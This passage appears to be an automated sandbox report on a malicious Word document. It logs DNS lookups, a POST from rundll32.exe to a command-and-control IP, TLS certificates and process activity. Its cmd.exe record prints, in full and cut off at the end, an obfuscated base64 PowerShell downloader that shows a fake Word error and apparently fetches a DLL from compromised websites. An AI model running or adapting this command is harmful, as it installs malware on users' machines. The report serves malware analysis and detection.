                                                                                                                              Feb 1, 2021 23:26:34.848577976 CET44349775173.249.20.233192.168.2.4
                                                                                                                              Feb 1, 2021 23:26:34.850725889 CET44349775173.249.20.233192.168.2.4
                                                                                                                              Feb 1, 2021 23:26:34.850754976 CET44349775173.249.20.233192.168.2.4
                                                                                                                              Feb 1, 2021 23:26:35.634749889 CET44349775173.249.20.233192.168.2.4
                                                                                                                              Feb 1, 2021 23:26:35.634802103 CET44349775173.249.20.233192.168.2.4
                                                                                                                              Feb 1, 2021 23:26:35.634838104 CET44349775173.249.20.233192.168.2.4
                                                                                                                              Feb 1, 2021 23:26:35.634865046 CET44349775173.249.20.233192.168.2.4
                                                                                                                              Feb 1, 2021 23:26:35.634900093 CET44349775173.249.20.233192.168.2.4
                                                                                                                              Feb 1, 2021 23:26:35.634922981 CET49775443192.168.2.4173.249.20.233
                                                                                                                              Feb 1, 2021 23:26:35.635005951 CET49775443192.168.2.4173.249.20.233

                                                                                                                              UDP Packets

                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                              Feb 1, 2021 23:24:58.880695105 CET5802853192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:24:58.928853989 CET53580288.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:00.078610897 CET5309753192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:00.135023117 CET53530978.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:01.324814081 CET4925753192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:01.372632980 CET53492578.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:02.746282101 CET6238953192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:02.797038078 CET53623898.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:04.148582935 CET4991053192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:04.200645924 CET53499108.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:04.974355936 CET5585453192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:05.045759916 CET53558548.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:05.620496988 CET6454953192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:05.689152002 CET53645498.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:06.620959997 CET6454953192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:06.678680897 CET53645498.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:06.708297014 CET6315353192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:06.756216049 CET53631538.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:07.636528015 CET6454953192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:07.694077969 CET53645498.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:07.961083889 CET5299153192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:08.008883953 CET53529918.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:09.209168911 CET5370053192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:09.259351015 CET53537008.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:09.653359890 CET6454953192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:09.714550018 CET53645498.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:10.767510891 CET5172653192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:10.823693037 CET53517268.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:11.948971987 CET5679453192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:12.007550001 CET53567948.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:12.912555933 CET5653453192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:12.960546017 CET53565348.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:13.668315887 CET6454953192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:13.724653006 CET53645498.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:13.963905096 CET5662753192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:14.015094995 CET53566278.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:15.228617907 CET5662153192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:15.279382944 CET53566218.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:15.730209112 CET6311653192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:15.794337988 CET53631168.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:16.395081997 CET6407853192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:16.455329895 CET53640788.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:16.674420118 CET6480153192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:16.839863062 CET53648018.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:16.854863882 CET6172153192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:16.910959005 CET53617218.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.589114904 CET5125553192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:17.639827013 CET53512558.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:21.696125984 CET6152253192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:21.755196095 CET53615228.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:23.831988096 CET5233753192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:23.880327940 CET53523378.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:29.161744118 CET5504653192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:29.224725962 CET53550468.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:43.635374069 CET4961253192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:43.695733070 CET53496128.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:44.288331985 CET4928553192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:44.344719887 CET53492858.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:44.961225033 CET5060153192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:45.010988951 CET53506018.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:45.397160053 CET6087553192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:45.469964027 CET5644853192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:45.472508907 CET53608758.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:45.556623936 CET53564488.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:46.067111015 CET5917253192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:46.123389006 CET53591728.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:46.673748970 CET6242053192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:46.730539083 CET53624208.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:47.361151934 CET6057953192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:47.420326948 CET53605798.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:47.830176115 CET5018353192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:47.878108978 CET53501838.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:48.203210115 CET6153153192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:48.259474993 CET53615318.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:49.472291946 CET4922853192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:49.531461000 CET53492288.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:50.022305012 CET5979453192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:50.074915886 CET53597948.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:59.745949030 CET5591653192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:59.794500113 CET53559168.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:26:00.062516928 CET5275253192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:26:00.121984959 CET53527528.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:26:02.930495024 CET6054253192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:26:02.991489887 CET53605428.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:26:33.801259041 CET6068953192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:26:33.850214958 CET53606898.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:26:35.533540964 CET6420653192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:26:35.589812994 CET53642068.8.8.8192.168.2.4

                                                                                                                              DNS Queries

                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                              Feb 1, 2021 23:25:15.730209112 CET192.168.2.48.8.8.80xd28eStandard query (0)physio-svdh.chA (IP address)IN (0x0001)
                                                                                                                              Feb 1, 2021 23:25:16.674420118 CET192.168.2.48.8.8.80x8fb2Standard query (0)www.isatechnology.comA (IP address)IN (0x0001)
                                                                                                                              Feb 1, 2021 23:25:16.854863882 CET192.168.2.48.8.8.80xb149Standard query (0)www.isatechnology.comA (IP address)IN (0x0001)

                                                                                                                              DNS Answers

                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                              Feb 1, 2021 23:25:15.794337988 CET8.8.8.8192.168.2.40xd28eNo error (0)physio-svdh.ch194.209.195.106A (IP address)IN (0x0001)
                                                                                                                              Feb 1, 2021 23:25:16.839863062 CET8.8.8.8192.168.2.40x8fb2No error (0)www.isatechnology.comisatechnology.comCNAME (Canonical name)IN (0x0001)
                                                                                                                              Feb 1, 2021 23:25:16.839863062 CET8.8.8.8192.168.2.40x8fb2No error (0)isatechnology.com35.208.182.43A (IP address)IN (0x0001)
                                                                                                                              Feb 1, 2021 23:25:16.910959005 CET8.8.8.8192.168.2.40xb149No error (0)www.isatechnology.comisatechnology.comCNAME (Canonical name)IN (0x0001)
                                                                                                                              Feb 1, 2021 23:25:16.910959005 CET8.8.8.8192.168.2.40xb149No error (0)isatechnology.com35.208.182.43A (IP address)IN (0x0001)

                                                                                                                              HTTP Request Dependency Graph

                                                                                                                              • 173.249.20.233
                                                                                                                                • 173.249.20.233:443

                                                                                                                              HTTP Packets

                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                              0192.168.2.449775173.249.20.233443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                              Feb 1, 2021 23:26:34.798719883 CET5316OUTPOST /hzctvbal94fl2bqa/ HTTP/1.1
                                                                                                                              DNT: 0
                                                                                                                              Referer: 173.249.20.233/hzctvbal94fl2bqa/
                                                                                                                              Content-Type: multipart/form-data; boundary=------------------eWKPCakCSQtYkd9BaQ
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                              Host: 173.249.20.233:443
                                                                                                                              Content-Length: 8516
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Feb 1, 2021 23:26:35.634749889 CET5329INHTTP/1.1 200 OK
                                                                                                                              Server: nginx
                                                                                                                              Date: Mon, 01 Feb 2021 22:26:35 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              Data Raw: 66 33 34 0d 0a 60 dd f8 6b f5 7b 0f 72 df 61 1b cd 10 8e 91 aa 4c ff 8b ca 73 b3 c5 42 00 7c 08 b1 eb 43 17 26 a4 3b 38 3d 07 29 68 f3 a1 26 be 06 ff 46 31 95 d0 01 17 98 86 bd 9f 52 f3 6a 83 29 fb 9c 35 06 de df 7d 24 61 95 2f b9 08 2a aa 20 59 22 15 ea 23 52 7e d4 bb ac fd 43 87 48 cc df 73 af 90 21 96 a3 7d 56 31 8e 27 be 2a 85 a8 52 60 dd f6 4d 4e 5d e7 e6 39 a0 40 bc 4d 93 a4 e2 2b 05 06 a4 9d d5 45 65 d4 e0 e0 4b e1 c2 ea 76 a9 33 10 82 70 4c 88 27 9c d2 5b 6f 4d 2b 71 47 0b 62 d0 63 b3 9c be b3 25 be fa b7 55 42 d1 2e 42 1a d1 11 f9 96 25 82 36 ab 2e 2a 41 1d 0c 85 b6 67 a0 f2 15 21 5b 21 4a 61 df 46 91 b0 1f e4 78 2c 07 61 62 3b df 54 d4 b6 07 25 38 02 a8 04 55 79 08 f9 28 a9 33 f5 88 89 11 74 58 fa 84 29 e3 c4 88 15 85 cc 7d 86 bc 16 7b fc f5 10 0a 52 b7 68 23 29 40 e3 81 ce 9a d5 51 5e 44 ab 56 a5 f6 51 44 88 5b ce e5 2c 91 6e 73 34 c6 b8 ea 50 82 13 8b c1 f2 48 17 93 4a ea f9 08 53 a3 3a a7 c0 57 ef d0 c0 bf f2 9c 71 12 6d ee 10 3a 0a 05 6e 82 6e 22 9d 5c 72 c2 b7 10 47 ef 13 7a f1 b8 c6 b7 de 7b 9c fb be b9 70 4b 82 04 54 e3 6c 12 b4 7c 9b cf c1 22 6e f5 e1 16 b9 47 d0 67 e7 fc d2 7c 8d 43 08 5c fb 5d 1a 16 3b 07 dc 55 60 5c aa 96 cd 8b 01 d2 e0 f7 86 8f e3 61 0a 56 38 24 e9 19 45 f0 3d 52 b4 fe 04 9a b1 86 3b 0b b0 4f 15 09 ae 5b 9a 04 a6 17 92 96 73 f7 d4 86 82 fe 11 60 c8 15 81 a4 cf 75 7f 7a 89 f1 6f 2d f1 f3 aa d2 07 25 6e c3 da 5c 62 94 08 1e a8 c4 eb 9f fd 77 00 2c cf f0 06 14 14 6a 68 d7 37 89 b5 2a bc eb 36 ae fb 9d fb 13 7e c5 f7 b2 79 a8 d4 1b 15 a9 9c ed 4d 39 6d a4 a2 37 bd f9 68 43 d0 7f ca fa 69 cf 6a df 39 3d be ef 9e 99 af a3 4e 75 ee f9 f0 99 d3 f9 1d 34 72 fb ea 0e e0 41 30 05 b4 f3 b5 59 1d 35 bb 34 b3 58 36 08 62 74 32 71 72 3e 97 c0 23 8d 66 04 29 09 08 56 4a a2 e2 91 16 bb 98 4a 1d 4b 95 2a 37 a5 8f ec 0d 6d ed 7a 5c c5 16 33 44 7d 26 c1 da da 9f 67 44 a6 36 7e e8 12 c9 40 05 5d 8b 8c 83 00 de bd 4f da 2a 67 3d 48 23 91 d0 cf 77 a8 a1 47 c1 9e 52 ab 54 6a 2d ce 9b b3 15 15 a7 0d 62 d4 74 08 50 6b 5d dc ab b8 c2 75 26 1f fb fd eb d3 c7 d0 6c dd ab b4 75 f1 a8 3c 59 47 5f c5 25 e4 da 5d f3 b3 b6 3f 30 01 df b4 cb af 3d 8b 0e 5f d2 b6 9d 1b 04 84 71 72 fa 35 e4 cf 84 93 6a ae 88 57 47 d5 e6 be 9c 43 8f 4d 47 05 e1 1d 05 84 e1 51 23 cb bc f3 58 86 78 de 32 f8 cf f8 5b 68 ab ef 06 7a 3f 17 88 19 8a 5e fb 0e 7c 5b 8d 9a 26 6f 5d c2 a4 c6 7c fd a1 e2 fa ab 47 ba 44 4e 15 14 ee c1 a8 14 8e 32 d9 43 50 7b 48 cc 42 89 fd 58 4e 0a 64 e0 ba 43 77 9e 7d 1d c9 45 9a 15 de f9 32 5b 5e fa 32 0b de ac 09 7c d5 1e aa 6f c0 71 ac 1e c4 e9 76 de 35 56 d7 7b 21 89 b4 7a 74 88 8a 9c 08 8f 96 3d ad f0 63 14 b1 24 20 28 7b 57 bd 87 95 b6 6d 94 22 5e e7 61 d7 96 97 6e 36 d4 d4 83 fc 71 37 7f 53 4d 7a 1d 22 e4 f0 00 a9 8a 32 15 a8 b4 9a b9 6f c0 d7 df 4e ca 32 61 aa e9 20 4a ad 60 c4 f9 48 43 08 74 8d d4 4d 24 ff b5 ca f1 c4 aa 85 89 9b 2f 28 b5 7a 19 ab 56 63 42 9d de 99 47 15 58 e2 73 5a a4 5b 24 e7 f1 0f 85 a8 28 36 87 4e 7d a5 dc 15 7a ef 50 4d 28 4c 3a dc a3 00 4d c8 01 83 2b 02 57 63 ed 01 e7 bd 98 39 dd 97 92 10 a4 b0 9c 1d 91 85 45 78 cd 6e d8 85 78 f0 93 a0 60 2c b3 d3 9a 31 49 b7 e4 d0 f6 c9 be e2 9f 0e 0a da e9 d2 6a e8 c9 be e8 d8 f8 dc 69 e2 13 0d 43 7b db e4 4c 7e e4 45 d7 63 f5 ae 31 d2 0a e6 47 02 98 ae 17 e4 05 b1 20 a8 86 32 2a 7a c4 63 30 91 e6 96 04 62 cf cd e7 74 42 41 e7 44 4d e0 e3 43 a0 e1 69 22 5a 48 f8 a4 e4 46 36 e0 41 c1 1e 09 b1 92 31 9b 61 80 0e 4c 98 11 3b 6d 1e 68 35 05 11 9e e0 53 d7 18 1b 24 90 a8 08 ed 8c 41 45 66 b3 7f 97 a6 97 4c 99 7f 69 31 b1 28
                                                                                                                              Data Ascii: f34`k{raLsB|C&;8=)h&F1Rj)5}$a/* Y"#R~CHs!}V1'*R`MN]9@M+EeKv3pL'[oM+qGbc%UB.B%6.*Ag![!JaFx,ab;T%8Uy(3tX)}{Rh#)@Q^DVQD[,ns4PHJS:Wqm:nn"\rGz{pKTl|"nGg|C\];U`\aV8$E=R;O[s`uzo-%n\bw,jh7*6~yM9m7hCij9=Nu4rA0Y54X6bt2qr>#f)VJJK*7mz\3D}&gD6~@]O*g=H#wGRTj-btPk]u&lu<YG_%]?0=_qr5jWGCMGQ#Xx2[hz?^|[&o]|GDN2CP{HBXNdCw}E2[^2|oqv5V{!zt=c$ ({Wm"^an6q7SMz"2oN2a J`HCtM$/(zVcBGXsZ[$(6N}zPM(L:M+Wc9Exnx`,1IjiC{L~Ec1G 2*zc0btBADMCi"ZHF6A1aL;mh5S$AEfLi1(


                                                                                                                              HTTPS Packets

                                                                                                                              TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                              Feb 1, 2021 23:25:15.906698942 CET194.209.195.106443192.168.2.449742CN=physio-svdh.ch CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Sat Jan 02 17:26:00 CET 2021 Wed Oct 07 21:21:40 CEST 2020Fri Apr 02 18:26:00 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,03b5074b1b5d032e5620f69f9f700ff0e
                                                                                                                              CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                                                                                              Feb 1, 2021 23:25:17.220958948 CET35.208.182.43443192.168.2.449744CN=isatechnology.com CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Fri Jan 15 19:51:39 CET 2021 Wed Oct 07 21:21:40 CEST 2020Thu Apr 15 20:51:39 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,03b5074b1b5d032e5620f69f9f700ff0e
                                                                                                                              CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021

                                                                                                                              Code Manipulations

                                                                                                                              Statistics

                                                                                                                              CPU Usage

                                                                                                                              Click to jump to process

                                                                                                                              Memory Usage

                                                                                                                              Click to jump to process

                                                                                                                              High Level Behavior Distribution

                                                                                                                              Click to dive into process behavior distribution

                                                                                                                              Behavior

                                                                                                                              Click to jump to process

                                                                                                                              System Behavior

                                                                                                                              Analysis Process: WINWORD.EXE PID: 4180 Parent PID: 800

                                                                                                                              General

                                                                                                                              Start time:23:25:04
                                                                                                                              Start date:01/02/2021
                                                                                                                              Path:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding
                                                                                                                              Imagebase:0x1d0000
                                                                                                                              File size:1937688 bytes
                                                                                                                              MD5 hash:0B9AB9B9C4DE429473D6450D4297A123
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high

                                                                                                                              Chronological Activities

                                                                                                                              Analysis Process: cmd.exe PID: 5632 Parent PID: 5060

                                                                                                                              General

                                                                                                                              Start time:23:25:08
                                                                                                                              Start date:01/02/2021
                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJwArACcAMwBzACcAKwAoACgAJwAyACkAJwApACkAKwAoACgAJwAoAGMAYQBpAHIAbwBjACcAKwAnAGEAJwArACcAZAAnACkAKQArACcALgBjACcAKwAoACgAJwBvAG0AJwArACcASgApACgAJwArACcAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACgAYwAnACkAKQArACgAJwBnAGkAJwArACcALQAnACsAJwBiAGkAbgBKACcAKQArACgAKAAnACkAKAAzAHMAMgApACgAJwArACcAMQBQACcAKwAnAEIAJwArACcAQgAnACkAKQArACgAKAAnAEoAKQAoADMAcwAyACkAJwArACcAKAAnACkAKQArACcAQAAnACsAKAAnAGgAJwArACcAdAB0ACcAKQArACcAcAAnACsAJwBzACcAKwAoACgAJwA6AEoAKQAoADMAcwAyACcAKwAnACkAKABKACcAKwAnACkAKAAzACcAKQApACsAJwBzACcAKwAoACgAJwAyACkAKAAnACsAJwB3ACcAKQApACsAKAAnAHcAdwAuACcAKwAnAGkAJwArACcAcwBhAHQAZQBjAGgAbgBvACcAKQArACcAbAAnACsAKAAnAG8AJwArACcAZwB5AC4AJwApACsAKAAoACcAYwBvAG0ASgAnACsAJwApACgAMwBzACcAKwAnADIAKQAnACsAJwAoAHQAJwArACcAcgBhAGkAbgBpAG4AZwAnACsAJwBKACkAKAAnACsAJwAzACcAKQApACsAJwBzADIAJwArACgAKAAnACkAJwArACcAKABiAEoAJwArACcAKQAoACcAKQApACsAKAAoACcAMwBzADIAJwArACcAKQAnACkAKQArACgAKAAnACgAQABoAHQAJwArACcAdAAnACkAKQArACcAcAAnACsAJwA6ACcAKwAoACgAJwBKACkAJwApACkAKwAnACgAJwArACcAMwAnACsAKAAoACcAcwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAKQAnACkAKQArACgAKAAnACgAMwBzACcAKwAnADIAJwApACkAKwAnACkAJwArACgAKAAnACgAaABvACcAKwAnAHQAZQAnACkAKQArACgAJwBsACcAKwAnAHMAaABpAHYAJwApACsAKAAnAGEAJwArACcAbgBzAGgAJwApACsAKAAoACcALgBjACcAKwAnAG8AbQBKACkAKAAnACkAKQArACcAMwBzACcAKwAoACgAJwAyACkAKABVAHMAJwArACcAZQByAEYAJwArACcAaQAnACkAKQArACgAJwBsACcAKwAnAGUAcwAnACkAKwAnAEoAJwArACgAKAAnACkAKAAnACkAKQArACgAJwAzACcAKwAnAHMAMgAnACkAKwAoACgAJwApACgAJwArACcAOABKACkAJwArACcAKAAzAHMAMgApACcAKQApACsAKAAoACcAKAAnACsAJwBAAGgAJwApACkAKwAoACgAJwB0AHQAcAA6AEoAKQAoADMAcwAyACcAKwAnACkA